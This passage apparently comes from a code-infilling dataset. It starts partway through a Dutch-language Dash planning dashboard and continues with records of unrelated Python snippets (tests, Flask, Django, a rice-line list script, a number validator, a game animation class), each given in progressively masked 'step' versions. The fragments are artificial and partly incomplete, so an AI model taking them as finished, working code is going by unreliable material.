name != None],\n multi=True,\n searchable=False,\n value = data['arrays'][config.get('Custom Field for Categories')]\n ),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(id='urenpermaand')\n ]\n ),\n ]\n ),\n html.Div(\n className='tab1_div3',\n 
style=globals['styles']['maindivs'],\n children=[\n html.H4('Nog in te plannen uren (per lijst)'),\n dcc.Markdown('''*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'''),\n dcc.Markdown('''*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'''),\n dcc.Markdown('''*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'''),\n dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''), \n html.Div(\n style=globals['styles']['divgraphs'],\n children=[\n dcc.Graph(\n id='graph_nietingepland',\n figure={'data': data['graphdata']['nietingepland'],\n 'layout': globals['graphlayouts']['bars']} \n )\n ]\n ),\n ]\n ), \n html.Div(\n className='tab1_div4',\n style=globals['styles']['maindivs'],\n children=[\n html.H4('Nog in te plannen uren (per epic)'),\n dcc.Markdown('''**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'''), \n html.Div(\n style=globals['styles']['divgraphs'],\n children=[ \n dcc.Graph(\n id='graph_nietingepland_epics',\n figure={'data': data['graphdata']['nietingeplandepics'],\n 'layout': globals['graphlayouts']['bars']}\n ) \n ]\n ),\n ]\n ), \n ]\n ), \n dcc.Tab(\n style=globals['styles']['tabs'], \n label='Tactische planning',\n children=[\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'], \n children=[\n html.H3('Uitleg'),\n dcc.Markdown('''In dit tabblad is een middellange termijnplanning te zien.'''),\n\n ]\n ),\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'], \n children=[\n html.H4('Totalen'),\n dcc.Markdown('''Hieronder staan twee totaaloverzichten van de aankomende maanden.'''),\n dcc.Markdown('''De blauwe balk geeft de ingeplande uren weer. 
De streep geeft de beschikbare uren aan.'''),\n dcc.Markdown('''Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'''),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[\n dcc.Graph(\n figure=(data['graphdata']['gaugefig'])\n )\n ]\n )\n\n ]\n ),\n html.Div(\n className='maindivs',\n style=globals['styles']['maindivs'], \n children=[\n html.H4('Gantt'),\n dcc.Dropdown(\n style = globals['styles']['dropdowns'],\n id='dropdowngantttactisch',\n options=[{'label':j, 'value': i} for i,j in data['arrays']['threemonths']],\n multi=False,\n searchable=False,\n value = data['arrays']['threemonths'][0][0],\n ),\n html.Div(\n style=globals['styles']['divgraphs'],\n children=[\n dcc.Graph(id='gantttactisch'\n )\n \n ]\n )\n\n ]\n ),\n ]\n\n\n ),\n# dcc.Tab(\n# style=globals['styles']['tabs'], \n# label='Configuratie',\n# children=[\n# html.Div(\n# className='maindivs',\n# style=globals['styles']['maindivs'], \n# children=[\n# html.H3('Uitleg'),\n# dcc.Markdown('''Klik op de button hieronder om de huidige configuratie te downloaden.'''),\n# html.A(id='export_link', href='/dash/configuration/', children=[html.Button(id='export_button', type='button', children=['Export'])]),\n\n# dcc.Markdown('''Pas het bestand aan en upload deze hieronder.'''),\n# dcc.Upload(\n# id='configupload',\n# children=html.Div([\n# 'Sleep het bestand of ',\n# html.A('selecteer het bestand')\n\n# ]),\n# style=globals['styles']['divgraphs'],\n# multiple=False,\n\n# ),\n \n# html.Div(id='confirmupload',style=globals['styles']['divgraphs'])\n# ]\n# ), \n# ]\n\n\n# ) \n ]\n )\n ]\n )\n\n\n#---! 
gantttactisch\n@app.callback(Output('gantttactisch', 'figure'),\n [Input('dropdowngantttactisch','value')]\n\n)\n\ndef update_gantttactisch(v1):\n if v1 != None: \n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4])+1)+'01'\n else:\n v1plus1 = str(int(v1)+1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4])-1)+'12'\n else:\n v1min1 = str(int(v1)-1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4])+1)+'01'\n else:\n v1plus2 = str(int(v1)+2)\n\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata= []\n monthkey = int(v1)\n for i,j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')) <= monthkey and int(datetime.strftime(j['Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(v1min1+'01','%Y%m%d').date():\n start=datetime.strptime(v1min1+'01','%Y%m%d').date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(v1plus2+'01','%Y%m%d').date():\n eind=datetime.strptime(v1plus2+'01','%Y%m%d').date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'],\n Start=start,\n Finish=eind,\n Resource=j['Naam'] + ' (uren: ' + str(round(data['urenperdagperkaart'][j['Naam']]['urenperperiode'][v1])) + ')'\n ))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str,r))\n s1 = \"rgb(\"\n s3 = \")\"\n rgb.append(s1 + s2 + s3) \n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=True, group_tasks=False, showgrid_x=True, showgrid_y=True, colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4]+'-'+v1[4:]+'-01',v1[0:4]+'-'+v1[4:]+'-01'],y=[-1,len(result)], line={'shape': 'spline', 'color': 'black', 'width': 4}, showlegend=False))\n 
fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4]+'-'+v1plus1[4:]+'-01',v1plus1[0:4]+'-'+v1plus1[4:]+'-01'],y=[-1,len(result)], line={'shape': 'spline', 'color': 'black', 'width': 4}, showlegend=False))\n return fig \n else:\n return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n\n\n# #---! configupload\n# @app.callback(Output('confirmupload', 'children'),\n# [Input('configupload','contents')]\n\n# )\n# def confirm_upload(contents):\n# global newconfig\n# if contents is not None:\n# try:\n# newconfig = json.loads(base64.b64decode(contents[23:]).decode('ASCII'))\n# d = {}\n# for key,value in newconfig.items():\n# if type(value) == list:\n# d[key] = ''\n# for i in value:\n# if d[key] == '':\n# d[key] += i \n# else:\n# if i == value[-1]:\n# d[key] += (', '+i)\n# else:\n# d[key] = value\n\n# return html.Div(\n# id='returneddiv',\n# style=globals['styles']['divgraphs'],\n# children=[ \n# dcc.Markdown('''Check hieronder of de juiste data is ingevoerd. Klik daarna daaronder op 'Opslaan'.'''),\n# dash_table.DataTable(\n# style_header={'backgroundColor': 'rgba(62,182,235,0.6)','color': 'black', 'fontWeight': 'bold', 'fontFamily': 'Arial'},\n# style_cell = {'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black','text-align': 'left', 'fontFamily': 'Arial'}, \n# columns=[{'name': 'Sleutel', 'id': 'Sleutel'}, {'name': 'Waarde', 'id': 'Waarde'}],\n# data=[{'Sleutel': key, 'Waarde': value} for key, value in d.items()]\n\n# ),\n# html.Button(\n# 'Opslaan',\n# id='save_button', \n# n_clicks=0\n# ),\n# html.Div(\n# id='savedornot',\n \n# )\n# ]\n# )\n# except:\n# return html.H5('Het bestand is incorrect. Download en upload opnieuw!')\n\n# else:\n# return\n\n\n# #---! 
save-button\n# @app.callback(Output('savedornot','children'),\n# [Input('save_button','n_clicks'),])\n# def save_fnct(n_clicks):\n# if n_clicks > 0:\n# with open('./configuration/configuration.txt','w') as outfile:\n# json.dump(newconfig, outfile, indent=4, sort_keys=True)\n# return 'Opgeslagen. Refresh de page.'\n# else:\n# return \n\n\n#---! ganttpersoon \n@app.callback(Output('ganttpersoon','figure'),\n [Input('dropdownganttpersoon','value'),\n Input('dropdownganttpersoonstatus', 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i,j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'],\n Start=j[config.get('Custom Field for Starting date')].date(),\n Finish = j[config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']\n ))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n return fig \n else:\n return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n \n\n\n\n#---! 
ganttepics\n@app.callback(Output('ganttepics','figure'),\n [Input('dropdownganttepics','value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i,j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'],\n Start=j[config.get('Custom Field for Starting date')].date(),\n Finish = j[config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']\n ))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource', show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',)\n return fig \n else:\n return {'data': [go.Pie()],'layout': go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n \n\n#---! urenpermaand callback\n@app.callback(Output('urenpermaand', 'figure'),\n [Input('dropdownurenpermaand', 'value')]\n )\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', \n plot_bgcolor='rgba(0,0,0,0)',\n xaxis={'title': 'Datum', 'gridcolor': 'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in data['urenperdagperkaart'].values() if value[config.get('Custom Field for Categories')] == 'Regulier werk']),0))\n bars.append(dict(x=data['arrays']['xaxis_months'],\n y=yaxis,\n name='Regulier werk',\n line = {'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers',\n marker= {'symbol': 'triangle-up-open', 'size': 10},\n stackgroup='one', \n ))\n \n \n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n 
yaxis.append(round(sum([value['urenperperiode'][i] for value in data['urenperdagperkaart'].values() if value[config.get('Custom Field for Categories')] == categorie]),0))\n bars.append(dict(x=data['arrays']['xaxis_months'],\n y=yaxis,\n name=categorienaam,\n line = {'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers',\n marker= {'symbol': 'triangle-up-open', 'size': 10},\n stackgroup='one', \n ))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in data['beschikbareuren'].values()]),0))\n bars.append(dict(name='Totaal beschikbare uren',\n mode = 'lines',\n x = data['arrays']['xaxis_months'],\n y = yaxis,\n size=10,\n line = {'shape': 'spline', 'smoothing': 0.3, 'width':6, 'color': 'black'},\n \n )) \n \n \n \n return {\n 'data': bars,\n 'layout': layout}\n\n#--! App routes\n\n@app.server.route(\"/dash/configuration/\")\ndef download_file():\n\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename=\"configuration.txt\",\n as_attachment=True,\n cache_timeout=0\n )\n\n\n\n\n\n\n\n#--! Check if this is the main app and if so, run Dash!\nif __name__ == '__main__':\n app.run_server(debug=False,host='0.0.0.0', port=8050)\n \n",
"step-ids": [
2,
8,
10,
11,
12
]
}
|
[
2,
8,
10,
11,
12
] |
class TestContext:
def test_should_get_variable_from_env(self, monkeypatch, fake_context):
expected = "test"
monkeypatch.setenv("SOURCE_PATH", expected)
actual = fake_context.get("SOURCE_PATH")
assert actual == expected
def test_should_get_variable_from_local_state(self, fake_context):
expected = "test"
fake_context.set({"SOURCE_PATH": expected})
actual = fake_context.get("SOURCE_PATH")
assert actual == expected
def test_should_set_variable_to_local_state(self, fake_context):
expected = "test"
fake_context.set({"test": expected})
actual = fake_context.get("test")
assert actual == expected
|
normal
|
{
"blob_id": "e83a9a4675e5beed938860037658d33c4d347b29",
"index": 8528,
"step-1": "class TestContext:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class TestContext:\n <mask token>\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'SOURCE_PATH': expected})\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n <mask token>\n",
"step-3": "class TestContext:\n\n def test_should_get_variable_from_env(self, monkeypatch, fake_context):\n expected = 'test'\n monkeypatch.setenv('SOURCE_PATH', expected)\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'SOURCE_PATH': expected})\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n <mask token>\n",
"step-4": "class TestContext:\n\n def test_should_get_variable_from_env(self, monkeypatch, fake_context):\n expected = 'test'\n monkeypatch.setenv('SOURCE_PATH', expected)\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'SOURCE_PATH': expected})\n actual = fake_context.get('SOURCE_PATH')\n assert actual == expected\n\n def test_should_set_variable_to_local_state(self, fake_context):\n expected = 'test'\n fake_context.set({'test': expected})\n actual = fake_context.get('test')\n assert actual == expected\n",
"step-5": "class TestContext:\n def test_should_get_variable_from_env(self, monkeypatch, fake_context):\n expected = \"test\"\n monkeypatch.setenv(\"SOURCE_PATH\", expected)\n actual = fake_context.get(\"SOURCE_PATH\")\n assert actual == expected\n\n def test_should_get_variable_from_local_state(self, fake_context):\n expected = \"test\"\n fake_context.set({\"SOURCE_PATH\": expected})\n actual = fake_context.get(\"SOURCE_PATH\")\n assert actual == expected\n\n def test_should_set_variable_to_local_state(self, fake_context):\n expected = \"test\"\n fake_context.set({\"test\": expected})\n actual = fake_context.get(\"test\")\n assert actual == expected\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
micro_service = Flask(__name__)
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from flask import Flask
from flask import jsonify
micro_service = Flask(__name__)
@micro_service.route('/')
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
<|reserved_special_token_1|>
"""
Creating flask server that response with a json
"""
from flask import Flask
from flask import jsonify
micro_service = Flask(__name__)
@micro_service.route('/') # http://mysite.com/
def home():
return jsonify({'message': 'Hello, world!'})
if __name__ == '__main__':
micro_service.run()
|
flexible
|
{
"blob_id": "4b14dee3625d5d0c703176ed2f0a28b2583fd84d",
"index": 6519,
"step-1": "<mask token>\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n",
"step-3": "<mask token>\nmicro_service = Flask(__name__)\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n",
"step-4": "<mask token>\nfrom flask import Flask\nfrom flask import jsonify\nmicro_service = Flask(__name__)\n\n\n@micro_service.route('/')\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n",
"step-5": "\"\"\"\nCreating flask server that response with a json\n\"\"\"\n\nfrom flask import Flask\nfrom flask import jsonify\n\nmicro_service = Flask(__name__)\n\n\n@micro_service.route('/') # http://mysite.com/\ndef home():\n return jsonify({'message': 'Hello, world!'})\n\n\nif __name__ == '__main__':\n micro_service.run()\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
urlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(
'list/', vacancies_view, name='vacancy')]
<|reserved_special_token_1|>
from django.urls import path
from jobscrapper.views import *
urlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(
'list/', vacancies_view, name='vacancy')]
<|reserved_special_token_1|>
from django.urls import path
from jobscrapper.views import *
urlpatterns = [
path('', home_vacancies_view, name="vacancy-home"),
path('list/', vacancies_view, name="vacancy"),
]
|
flexible
|
{
"blob_id": "3ee20391d56d8c429ab1bd2f6b0e5b261721e401",
"index": 7965,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(\n 'list/', vacancies_view, name='vacancy')]\n",
"step-3": "from django.urls import path\nfrom jobscrapper.views import *\nurlpatterns = [path('', home_vacancies_view, name='vacancy-home'), path(\n 'list/', vacancies_view, name='vacancy')]\n",
"step-4": "from django.urls import path\nfrom jobscrapper.views import *\n\nurlpatterns = [\n path('', home_vacancies_view, name=\"vacancy-home\"),\n path('list/', vacancies_view, name=\"vacancy\"),\n\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/opt/Python/2.7.3/bin/python
import sys
from collections import defaultdict
import numpy as np
import re
import os
import argparse
from Bio import SeqIO
def usage():
test="name"
message='''
python CircosConf.py --input circos.config --output pipe.conf
'''
print message
def fasta_id(fastafile):
fastaid = defaultdict(str)
for record in SeqIO.parse(fastafile,"fasta"):
fastaid[record.id] = 1
return fastaid
#temperate.mPing.group.id
def readtable(infile):
data = defaultdict(str)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not data.has_key(unit[0]):
data[unit[0]] = 1
return data
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--input')
parser.add_argument('-o', '--output')
parser.add_argument('-v', dest='verbose', action='store_true')
args = parser.parse_args()
try:
len(args.input) > 0
except:
usage()
sys.exit(2)
unique_id = readtable(args.input)
#1 IRIS313-15896 Colombia Indica ERS467753 anonftp@ftp.ncbi.nlm.nih.gov:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra
infile = '../GigaScience/rice_line_IRRI_2466.download.list'
count = 0
other_id = defaultdict(lambda : int())
total_id = defaultdict(lambda : int())
r = re.compile(r'Japonica', re.IGNORECASE)
ofiles = []
for i in range(7):
ofile = open('%s.other%s.download.list' %(args.input, i), 'w')
ofiles.append(ofile)
with open (infile, 'r') as filehd:
for line in filehd:
line = line.rstrip()
if len(line) > 2:
unit = re.split(r'\t',line)
if not r.search(unit[3]):
continue
total_id[unit[1]] = 1
if not unique_id.has_key(unit[1]):
other_id[unit[1]] = 1
count = len(other_id.keys())
index = int(float(count)/100)
#print index, count, unit[1]
print >> ofiles[index], line
for i in range(7):
ofiles[i].close()
print 'high mping: %s (2 are not japonica in this group)' %(len(unique_id.keys()))
print 'other: %s' %(count)
print 'total: %s' %(len(total_id.keys()))
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "fe0d6cc03512d54d2d8722551e3f2a7c1bf43997",
"index": 3581,
"step-1": "#!/opt/Python/2.7.3/bin/python\nimport sys\nfrom collections import defaultdict\nimport numpy as np\nimport re\nimport os\nimport argparse\nfrom Bio import SeqIO\n\ndef usage():\n test=\"name\"\n message='''\npython CircosConf.py --input circos.config --output pipe.conf\n\n '''\n print message\n\ndef fasta_id(fastafile):\n fastaid = defaultdict(str)\n for record in SeqIO.parse(fastafile,\"fasta\"):\n fastaid[record.id] = 1\n return fastaid\n\n\n#temperate.mPing.group.id\ndef readtable(infile):\n data = defaultdict(str)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2: \n unit = re.split(r'\\t',line)\n if not data.has_key(unit[0]):\n data[unit[0]] = 1\n return data\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input')\n parser.add_argument('-o', '--output')\n parser.add_argument('-v', dest='verbose', action='store_true')\n args = parser.parse_args()\n try:\n len(args.input) > 0\n except:\n usage()\n sys.exit(2)\n\n unique_id = readtable(args.input)\n #1 IRIS313-15896 Colombia Indica ERS467753 anonftp@ftp.ncbi.nlm.nih.gov:/sra/sra-instant/reads/ByRun/sra/ERR/ERR626/ERR626447/ERR626447.sra\n infile = '../GigaScience/rice_line_IRRI_2466.download.list'\n count = 0\n other_id = defaultdict(lambda : int())\n total_id = defaultdict(lambda : int())\n r = re.compile(r'Japonica', re.IGNORECASE)\n ofiles = []\n for i in range(7):\n ofile = open('%s.other%s.download.list' %(args.input, i), 'w')\n ofiles.append(ofile)\n with open (infile, 'r') as filehd:\n for line in filehd:\n line = line.rstrip()\n if len(line) > 2:\n unit = re.split(r'\\t',line)\n if not r.search(unit[3]):\n continue\n total_id[unit[1]] = 1\n if not unique_id.has_key(unit[1]):\n other_id[unit[1]] = 1\n count = len(other_id.keys())\n index = int(float(count)/100)\n #print index, count, unit[1]\n print >> ofiles[index], line\n for i in range(7):\n ofiles[i].close()\n print 'high mping: %s (2 are not japonica in 
this group)' %(len(unique_id.keys()))\n print 'other: %s' %(count)\n print 'total: %s' %(len(total_id.keys()))\nif __name__ == '__main__':\n main()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def isNumber(self, A):
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
if len(A) == 0:
return 0
for c in A:
if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:
return 0
if 'e' in A:
A = A.split('e')
if len(A) != 2:
return 0
return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))
return int(self.isnum(A, 0))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def isNumber(self, A):
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
while len(A) > 0 and A[0] == ' ':
A = A[1:]
A = A[::-1]
if len(A) == 0:
return 0
for c in A:
if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:
return 0
if 'e' in A:
A = A.split('e')
if len(A) != 2:
return 0
return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))
return int(self.isnum(A, 0))
def isnum(self, A, i):
if A == '':
return False
if i == 1 or i == 0 and '.' not in A:
if A[0] in ['+', '-']:
A = A[1:]
if A == '':
return False
for c in A:
if c not in [str(i) for i in range(10)]:
return False
return True
A = A.split('.')
return (self.isnum(A[0], 1) or A[0] == '') and self.isnum(A[1], 1)
<|reserved_special_token_1|>
'''
Please Note:
Note: It is intended for some problems to be ambiguous. You should gather all requirements up front before implementing one.
Please think of all the corner cases and clarifications yourself.
Validate if a given string is numeric.
Examples:
1."0" => true
2." 0.1 " => true
3."abc" => false
4."1 a" => false
5."2e10" => true
Return 0 / 1 ( 0 for false, 1 for true ) for this problem
Clarify the question using “See Expected Output”
1.Is 1u ( which may be a representation for unsigned integers valid?
For this problem, no.
2.Is 0.1e10 valid?
Yes
3.-01.1e-10?
Yes
4.Hexadecimal numbers like 0xFF?
Not for the purpose of this problem
5. 3. (. not followed by a digit)?
No
6.Can exponent have decimal numbers? 3e0.1?
Not for this problem.
7.Is 1f ( floating point number with f as prefix ) valid?
Not for this problem.
8.How about 1000LL or 1000L ( C++ representation for long and long long numbers )?
Not for this problem.
9.How about integers preceded by 00 or 0? like 008?
Yes for this problem
'''
class Solution:
# @param A : string
# @return an integer
def isNumber(self, A):
while len(A)>0 and A[0]==' ':
A = A[1:]
A=A[::-1]
while len(A)>0 and A[0]==' ':
A = A[1:]
A=A[::-1]
if len(A)==0:
return 0
for c in A:
if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:
return 0
if 'e' in A:
A = A.split('e')
if len(A)!=2:
return 0
return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))
return int(self.isnum(A, 0))
def isnum(self, A, i):
#print(A,i)
if A=='':
return False
if i == 1 or (i == 0 and '.' not in A):
if A[0] in ['+', '-']:
A = A[1:]
if A == '':
return False
for c in A:
if c not in [str(i) for i in range(10)]:
return False
return True
A = A.split('.')
return (self.isnum(A[0], 1) or A[0]=='') and self.isnum(A[1], 1)
|
flexible
|
{
"blob_id": "50be2cbdaec6ed76e5d9367c6a83222f9153db82",
"index": 7426,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def isNumber(self, A):\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n if len(A) == 0:\n return 0\n for c in A:\n if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:\n return 0\n if 'e' in A:\n A = A.split('e')\n if len(A) != 2:\n return 0\n return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))\n return int(self.isnum(A, 0))\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def isNumber(self, A):\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n while len(A) > 0 and A[0] == ' ':\n A = A[1:]\n A = A[::-1]\n if len(A) == 0:\n return 0\n for c in A:\n if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:\n return 0\n if 'e' in A:\n A = A.split('e')\n if len(A) != 2:\n return 0\n return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))\n return int(self.isnum(A, 0))\n\n def isnum(self, A, i):\n if A == '':\n return False\n if i == 1 or i == 0 and '.' not in A:\n if A[0] in ['+', '-']:\n A = A[1:]\n if A == '':\n return False\n for c in A:\n if c not in [str(i) for i in range(10)]:\n return False\n return True\n A = A.split('.')\n return (self.isnum(A[0], 1) or A[0] == '') and self.isnum(A[1], 1)\n",
"step-5": "'''\nPlease Note:\nNote: It is intended for some problems to be ambiguous. You should gather all requirements up front before implementing one.\n\nPlease think of all the corner cases and clarifications yourself.\n\nValidate if a given string is numeric.\n\nExamples:\n\n1.\"0\" => true\n2.\" 0.1 \" => true\n3.\"abc\" => false\n4.\"1 a\" => false\n5.\"2e10\" => true\nReturn 0 / 1 ( 0 for false, 1 for true ) for this problem\n\nClarify the question using “See Expected Output”\n\n1.Is 1u ( which may be a representation for unsigned integers valid?\nFor this problem, no.\n2.Is 0.1e10 valid?\nYes\n3.-01.1e-10?\nYes\n4.Hexadecimal numbers like 0xFF?\nNot for the purpose of this problem\n5. 3. (. not followed by a digit)?\nNo\n6.Can exponent have decimal numbers? 3e0.1?\nNot for this problem.\n7.Is 1f ( floating point number with f as prefix ) valid?\nNot for this problem.\n8.How about 1000LL or 1000L ( C++ representation for long and long long numbers )?\nNot for this problem.\n9.How about integers preceded by 00 or 0? like 008?\nYes for this problem\n'''\nclass Solution:\n # @param A : string\n # @return an integer\n def isNumber(self, A):\n while len(A)>0 and A[0]==' ':\n A = A[1:]\n A=A[::-1]\n while len(A)>0 and A[0]==' ':\n A = A[1:]\n A=A[::-1]\n if len(A)==0:\n return 0\n for c in A:\n if c not in [str(i) for i in range(10)] + ['.', 'e', '-', '+']:\n return 0\n if 'e' in A:\n A = A.split('e')\n if len(A)!=2:\n return 0\n return int(self.isnum(A[0], 0) and self.isnum(A[1], 1))\n return int(self.isnum(A, 0))\n \n def isnum(self, A, i):\n #print(A,i)\n if A=='':\n return False\n if i == 1 or (i == 0 and '.' not in A):\n if A[0] in ['+', '-']:\n A = A[1:]\n if A == '':\n return False\n for c in A:\n if c not in [str(i) for i in range(10)]:\n return False\n return True\n A = A.split('.')\n return (self.isnum(A[0], 1) or A[0]=='') and self.isnum(A[1], 1)\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Import other modules
from zelda_utilities.constants import *
# Helps establish the current frame for sprite animation/image changing
class Animation:
def __init__(self):
# Animation clock
self.next_frame = pygame.time.get_ticks()
# Starting frame
self.frame = 0
# ~12 frames/sec (1000ms // 12)
self.frame_time = 1000 // ANIMATION_RATE
def anim_sprite(self):
if pygame.time.get_ticks() > self.next_frame:
